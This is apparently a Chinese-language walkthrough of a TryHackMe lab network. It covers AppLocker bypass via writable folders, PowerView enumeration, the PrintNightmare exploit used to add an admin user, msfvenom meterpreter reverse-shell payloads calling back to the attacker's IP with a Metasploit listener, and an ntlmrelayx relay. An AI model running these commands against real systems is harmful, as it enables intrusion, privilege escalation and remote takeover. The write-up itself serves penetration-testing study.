xfreerdp /u:watamet /p:'Nothingtoworry!' /v:10.200.110.35

进入桌面拿powershell

我们用辅助工具https://github.com/carlospolop/winPE/tree/master/binaries/seatbelt

r3motecontrol/Ghostpack-CompiledBinaries: Compiled Binaries for Ghostpack (.NET v4.0) (github.com)

下载到kali,再上传

powershell.exe Invoke-WebRequest http://10.50.107.175/SeatbeltNet3.5x64.exe -outfile sb.exe

./sb.exe -group=system

我们发现其被锁定无法运行,那么,我们试试AppLocker绕过

运行secpol.msc

可以没用

我们找到了个绕过项目

api0cradle/UltimateAppLockerByPassList: The goal of this repository is to document the most common techniques to bypass AppLocker. (github.com)

我们输入

#A hacky script to convert YML to MD file the way I want
#Author: Oddvar Moe
#If you can use it, be my guest!

function Convert-YamlToMD
{
    [CmdletBinding()]
    Param
    (
        [Parameter(Mandatory=$true)]
        $YamlObject,

        [Parameter(Mandatory=$true)]
        [String]
        $Outfile
    )

    Begin
    {
    }
    Process
    {
        # Header
        "`#`# $($YamlObject.Name)" | Add-Content $Outfile
        "``````" | Add-Content $Outfile
        foreach($cmd in $YamlObject.Commands)
        {
            "`n$($cmd.command)" | Add-Content $Outfile
            "$($cmd.description)" | Add-Content $Outfile
        }
        "``````" | Add-Content $Outfile
        "* Windows binary: $($YamlObject.'Windows Binary')   " | Add-Content $Outfile
        "* Bypasses Default AppLocker Rules: $($YamlObject.'Bypasses Default AppLocker Rules')   " | Add-Content $Outfile
        "* Mitre: `[$($YamlObject.MITRE.ID)`]`($($YamlObject.MITRE.Link)`)   " | Add-Content $Outfile
        
        "   " | Add-Content $Outfile

        "* Links:   " | Add-Content $Outfile
        foreach($link in $YamlObject.Resources)
        {
            "  * $($link.link)" | Add-Content $Outfile
        }

        "   " | Add-Content $Outfile

        "* File path:   " | Add-Content $Outfile
        foreach($path in $YamlObject.'Full path')
        {
           "  * $($path.path)" | Add-Content $outfile
        }
        
        "   " | Add-Content $Outfile
        
        "* Acknowledgement:   " | Add-Content $Outfile
        foreach($person in $YamlObject.Acknowledgement)
        {
            "  * Name: $($person.Name)" | Add-Content $Outfile
            "    * Twitter: `[$($person.TwitterHandle)`]`(https://twitter.com/$($person.TwitterHandle)`)" | Add-Content $Outfile
            "    * Blog: $($person.Blog)" | Add-Content $Outfile
        }
        
        "   " | Add-Content $Outfile

        "OS:  " | Add-Content $Outfile
        foreach($OS in $YamlObject.'Verified on OS')
        {
            if($OS.Values -eq "true")
            {
                "`- `[x`] $($OS.Keys)" | Add-Content $Outfile
            }
        }

    }
    End
    {
    }
}


function Add-MainIndex
{
    [CmdletBinding()]
    Param
    (
        [Parameter(Mandatory=$true)]
        $YamlObject,

        [Parameter(Mandatory=$true)]
        [String]
        $Outfile
    )

    Begin
    {
    }
    Process
    {
        # Header
        # OS BINARIES
        #[Atbroker.exe](OSBinaries/Atbroker.md)    
        "`[$($YamlObject.Name)`]`(md/$($YamlObject.Name).md`)" | Add-Content $Outfile
        "" | Add-Content $Outfile
    }
    End
    {
    }
}

function New-MainIndex
{
    [CmdletBinding()]
    Param
    (
        [Parameter(Mandatory=$true)]
        [String]
        $Outfile,

        [ValidateSet("Verified","NotVerified")]
        [Parameter(Mandatory=$true)]
        [String]
        $Status
    )

    Begin
    {
    }
    Process
    {
        # Verified Header
        if($Status -eq "Verified")
        {
            "`# Verified AppLocker bypasses for Default rules" | Add-Content $Outfile
            "This list contains all the bypasses that has been verified to bypass AppLocker default rules." | Add-Content $Outfile
            "" | Add-Content $Outfile
        }

        #NotVerified Header
        if($Status -eq "NotVerified")
        {
            "`# Potential bypasses" | Add-Content $Outfile
            "This list contains all the bypasses that has NOT been verified, or does not bypass the default AppLocker rules (but can bypass AppLocker in other ways) or is a claimed bypass." | Add-Content $Outfile
            "" | Add-Content $Outfile
        }
    }
    End
    {
    }
}

$mainpath = "C:\data\gitprojects\UltimateAppLockerByPassList"

# Read yaml files
$bins = @()
cd "$mainpath\yml"
get-childitem | foreach{ 
    [string[]]$fileContent = Get-Content $_
    $content = ''
    foreach ($line in $fileContent) { $content = $content + "`n" + $line }
    $yaml = ConvertFrom-YAML $content
    $bins += $yaml
}

#Initialize index files
New-MainIndex -Status Verified -Outfile $mainpath"\VerifiedAppLockerBypasses.md"
New-MainIndex -Status NotVerified -Outfile $mainpath"\UnverifiedAppLockerBypasses.md"

$bins | foreach{
WRITE-HOST "$($_.name)"

Convert-YamlToMD -YamlObject $_ -Outfile "$mainpath\md\$($_.name).md"
if($_.'Bypasses Default AppLocker Rules')
{
    Add-MainIndex -YamlObject $_ -Outfile $mainpath"\VerifiedAppLockerBypasses.md"
}
else{
    Add-MainIndex -YamlObject $_ -Outfile $mainpath"\UnverifiedAppLockerBypasses.md"
}
}

不过我最开始用的是

$group = "*Users*"
$root_folder = "C:\windows"
write-output "[*] Processing folders recursively in $root_folder"
foreach($_ in (Get-ChildItem $root_folder -recurse -ErrorAction SilentlyContinue)){
if($_.PSIsContainer)
{
try{
$res = Get-acl $_.FullName 
} catch{
continue
}
foreach ($a in $res.access){
if ($a.IdentityReference -like $group){
if ( ($a.FileSystemRights -like "*Write*" -or $a.FileSystemRights -like "*CreateFiles*" ) -and $a.FileSystemRights -like "*ReadAndExecute*" ){
write-host "[+] " $_.FullName -foregroundcolor "green"
}

}
}
}
}

这让我们得到了几个没有锁的地带

切换到 C:\windows\Tasks

我们再次运行

.\Seatbealt.exe -group=system

结果出现了新的错误真是sun dog

下来使用powerviwe看看

输入Import-Module .\PowerView.ps1

Get-DomainUser

更多请看

PowerView-3.0 tips and tricks (github.com)

Dr.korbinian推荐:

# enumerate/list all groups present on a local machine/computer
Get-NetLocalGroup

# enumerate/list all members of a local group such as users, computers, or service accounts
Get-NetLocalGroupMember

# enumerate/list all users currently logged onto the local machine/computer
Get-NetLoggedon

# enumerate/list the active directory domain GPOs installed on the local machine
Get-DomainGPO

# check all hosts connected to the domain and check if the current user or listed user is a local administrator
Find-LocalAdminAccess

# list/enumerate all the scheduled tasks present on the system
Get-ScheduledTask

# list/enumerate all the scheduled tasks present on the system which are located in the Users directory
Get-ScheduledTask -TaskPath "\Users\*"

# list specific information on specified Tasks allowing the attacker to identify the task and how it could be exploited
Get-ScheduledTaskInfo -TaskName <Full Path>

# enumerate a user's groups or all groups within the domain. If it throws an error, you need to run the upcoming command
Import-Module ActiveDirectory; Get-ADGroup

# only possible in elevated powershell window - enables the ActiveDirectory module
Add-WindowsFeature RSAT-AD-PowerShell

# etrieve the groups a user, computer group, or service account is a member of (also only works with the ActiveDirectory module)
Get-ADPrincipalGroupMembership

下来我们进行提权

讲真,看上面的东西真的难搞,于是Dr.korbinian推荐了:

calebstewart/CVE-2021-1675: Pure PowerShell implementation of CVE-2021-1675 Print Spooler Local Privilege Escalation (PrintNightmare) (github.com)

毕竟靶机是2020年的,用个21年的漏洞简直降维打击

git clone https://github.com/calebstewart/CVE-2021-1675

powershell.exe Invoke-WebRequest http://10.50.107.175/CVE-2021-1675.ps1 -outfile CVE-2021-1675.ps1

Import-Module .\CVE-2021-1675.ps1
Invoke-Nightmare -NewUser "Zacarx" -NewPassword "zacax9981!"
net user Zacarx

接下来,我们走tryhackme的路线

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.50.107.175 LPORT=53 -f dll -o kavremoverENU.dll

set payload windows/meterpreter/reverse_tcp
set LHOST 10.50.107.175
set LPORT 53

msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost tun0
msf6 exploit(multi/handler) > set lport 53
msf6 exploit(multi/handler) > run

powershell.exe Invoke-WebRequest http://10.50.107.175/kavremoverENU.dll -outfile kavremoverENU.dll

nmap -p 445 --script smb2-security-mode 10.200.110.32 -Pn

参考文章

(6条消息) NTLM-relay攻击的原理与实现_Shanfenglan7的博客-CSDN博客_ntlm relay攻击

windows/x64/meterpreter/reverse_tcp LHOST=tun0 LPORT=53 -f exe > meterpreter_shell.exe

└─$ msfconsole -q 
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost tun0
msf6 exploit(multi/handler) > set lport 53
msf6 exploit(multi/handler) > run

sudo ntlmrelayx.py -t smb://10.200.110.30 -smb2support -socks

目录
相关文章
|
Linux 网络安全 Apache
怎么在树莓派上搭建web网站,并发布到外网可访问?
怎么在树莓派上搭建web网站,并发布到外网可访问?
223 0
|
7月前
|
关系型数据库 MySQL 应用服务中间件
【IIS搭建网站】在本地电脑上搭建web服务器并实现外网访问
在网上各种教程和介绍中,搭建网页都会借助各种软件的帮助,比如网页运行的Apache和Nginx、数据库软件MySQL和MSSQL之类,为方便用户使用,还出现了XAMPP、PHPStudy、宝塔面板等等一系列集成服务,都是为了方便我们能快速建立网站。是不是不适用这些软件就无法建立网站了呢?答案当然是否定的,在Windows系统中实际上集成了建立网站所必须的软件环境。今天就让我们来看看,如何使用Windows自带的网站程序建立网站吧。
|
Java
如何从外网通过HTTP和HTTPS访问本机localhost WEB服务器
HTTP和HTTPS访问本机localhost WEB服务器 内网主机上安装了WEB服务器,只能在局域网内或者本机上访问,怎样从公网也能访问本地WEB服务器? 本文将介绍使用holer实现的具体步骤。
2915 0
|
数据采集 安全 Ubuntu
看完这篇 教你玩转渗透测试靶机vulnhub——Ai-Web2
看完这篇 教你玩转渗透测试靶机vulnhub——Ai-Web2解析
586 0
看完这篇 教你玩转渗透测试靶机vulnhub——Ai-Web2
|
Windows
windows IIS搭建Web网站外网无法访问
将 127.0.0.1 上面的监听端口更换到 0.0.0.0
698 0
|
2月前
|
XML JSON API
ServiceStack:不仅仅是一个高性能Web API和微服务框架,更是一站式解决方案——深入解析其多协议支持及简便开发流程,带您体验前所未有的.NET开发效率革命
【10月更文挑战第9天】ServiceStack 是一个高性能的 Web API 和微服务框架,支持 JSON、XML、CSV 等多种数据格式。它简化了 .NET 应用的开发流程,提供了直观的 RESTful 服务构建方式。ServiceStack 支持高并发请求和复杂业务逻辑,安装简单,通过 NuGet 包管理器即可快速集成。示例代码展示了如何创建一个返回当前日期的简单服务,包括定义请求和响应 DTO、实现服务逻辑、配置路由和宿主。ServiceStack 还支持 WebSocket、SignalR 等实时通信协议,具备自动验证、自动过滤器等丰富功能,适合快速搭建高性能、可扩展的服务端应用。
149 3
|
1月前
|
设计模式 前端开发 数据库
Python Web开发:Django框架下的全栈开发实战
【10月更文挑战第27天】本文介绍了Django框架在Python Web开发中的应用,涵盖了Django与Flask等框架的比较、项目结构、模型、视图、模板和URL配置等内容,并展示了实际代码示例,帮助读者快速掌握Django全栈开发的核心技术。
162 45
|
12天前
|
前端开发 安全 JavaScript
2025年,Web3开发学习路线全指南
本文提供了一条针对Dapp应用开发的学习路线,涵盖了Web3领域的重要技术栈,如区块链基础、以太坊技术、Solidity编程、智能合约开发及安全、web3.js和ethers.js库的使用、Truffle框架等。文章首先分析了国内区块链企业的技术需求,随后详细介绍了每个技术点的学习资源和方法,旨在帮助初学者系统地掌握Dapp开发所需的知识和技能。
2025年,Web3开发学习路线全指南
|
18天前
|
存储 前端开发 JavaScript
如何在项目中高效地进行 Web 组件化开发
高效地进行 Web 组件化开发需要从多个方面入手,通过明确目标、合理规划、规范开发、加强测试等一系列措施,实现组件的高效管理和利用,从而提高项目的整体开发效率和质量,为用户提供更好的体验。
27 7
|
22天前
|
开发框架 搜索推荐 数据可视化
Django框架适合开发哪种类型的Web应用程序?
Django 框架凭借其强大的功能、稳定性和可扩展性,几乎可以适应各种类型的 Web 应用程序开发需求。无论是简单的网站还是复杂的企业级系统,Django 都能提供可靠的支持,帮助开发者快速构建高质量的应用。同时,其活跃的社区和丰富的资源也为开发者在项目实施过程中提供了有力的保障。